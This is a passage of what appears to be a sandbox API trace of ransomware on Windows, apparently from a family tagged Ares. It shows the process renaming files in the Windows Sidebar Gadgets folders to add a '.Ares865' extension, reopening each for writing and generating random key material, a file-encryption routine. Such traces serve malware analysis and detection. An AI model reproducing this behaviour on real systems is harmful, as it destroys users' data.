param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\slideShow.css.Ares865") returned 95 [0117.481] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\slideShow.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\slideshow.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\slideShow.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\slideshow.css.ares865"), dwFlags=0x1) returned 1 [0117.488] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\slideShow.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\slideshow.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.491] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4528) returned 1 [0117.495] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0117.499] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.499] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.502] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0117.503] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.503] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0117.503] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget" [0117.504] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png.Ares865") returned 79 [0117.504] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\drag.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\drag.png.ares865"), dwFlags=0x1) returned 1 [0117.507] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\drag.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.507] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8513) returned 1 [0117.507] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.508] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.508] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.520] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.521] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.521] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.521] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png.Ares865") returned 79 [0117.521] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\icon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\icon.png.ares865"), dwFlags=0x1) returned 1 [0117.523] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\icon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.523] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7431) returned 1 [0117.523] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.524] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.524] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.527] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.528] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.528] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.528] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png.Ares865") returned 79 [0117.528] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\logo.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\logo.png.ares865"), dwFlags=0x1) returned 1 [0117.530] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\logo.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.531] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6166) returned 1 [0117.531] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.532] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.532] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.534] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.535] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.535] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.536] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images" [0117.536] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif.Ares865") returned 93 [0117.536] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\16-on-black.gif"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\16-on-black.gif.ares865"), dwFlags=0x1) returned 1 [0117.538] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\16-on-black.gif.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\16-on-black.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.538] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4969) returned 1 [0117.539] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.539] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.539] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.543] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.543] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.543] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.544] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png.Ares865") returned 96 [0117.544] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_off.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_off.png.ares865"), dwFlags=0x1) returned 1 [0117.546] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_Off.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_off.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.546] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=293) returned 1 [0117.546] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.547] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.547] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.553] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.554] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.554] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.554] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png.Ares865") returned 95 [0117.554] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_on.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_on.png.ares865"), dwFlags=0x1) returned 1 [0117.557] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonDown_On.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttondown_on.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.557] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=463) returned 1 [0117.557] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.558] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.558] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.561] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.562] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.562] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.562] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png.Ares865") returned 94 [0117.562] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_off.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_off.png.ares865"), dwFlags=0x1) returned 1 [0117.564] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_Off.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_off.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.564] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=280) returned 1 [0117.565] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.565] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.565] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.569] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.569] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.569] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.570] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png.Ares865") returned 93 [0117.570] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_on.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_on.png.ares865"), dwFlags=0x1) returned 1 [0117.571] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\buttonUp_On.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\buttonup_on.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.571] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=451) returned 1 [0117.572] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.572] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.572] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.579] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.579] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.579] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.580] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png.Ares865") returned 92 [0117.580] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\flyoutback.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\flyoutback.png.ares865"), dwFlags=0x1) returned 1 [0117.583] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\flyoutBack.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\flyoutback.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.583] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4395) returned 1 [0117.583] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.584] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.584] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.588] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.588] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.588] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.589] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png.Ares865") returned 99 [0117.589] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_docked.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_docked.png.ares865"), dwFlags=0x1) returned 1 [0117.590] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_docked.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_docked.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.590] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=252) returned 1 [0117.591] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.591] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.591] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.595] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.595] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.595] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.596] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png.Ares865") returned 101 [0117.596] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_floating.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_floating.png.ares865"), dwFlags=0x1) returned 1 [0117.598] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_floating.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_floating.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.598] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2979) returned 1 [0117.598] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.599] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.599] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.601] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.602] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.602] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.603] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_flyout.png.Ares865") returned 99 [0117.603] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_flyout.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_flyout.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_flyout.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_flyout.png.ares865"), dwFlags=0x1) returned 1 [0117.604] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\item_hover_flyout.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\images\\item_hover_flyout.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0117.604] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2926) returned 1 [0117.604] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0117.605] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0117.605] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.608] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0117.608] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0117.608] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0117.609] 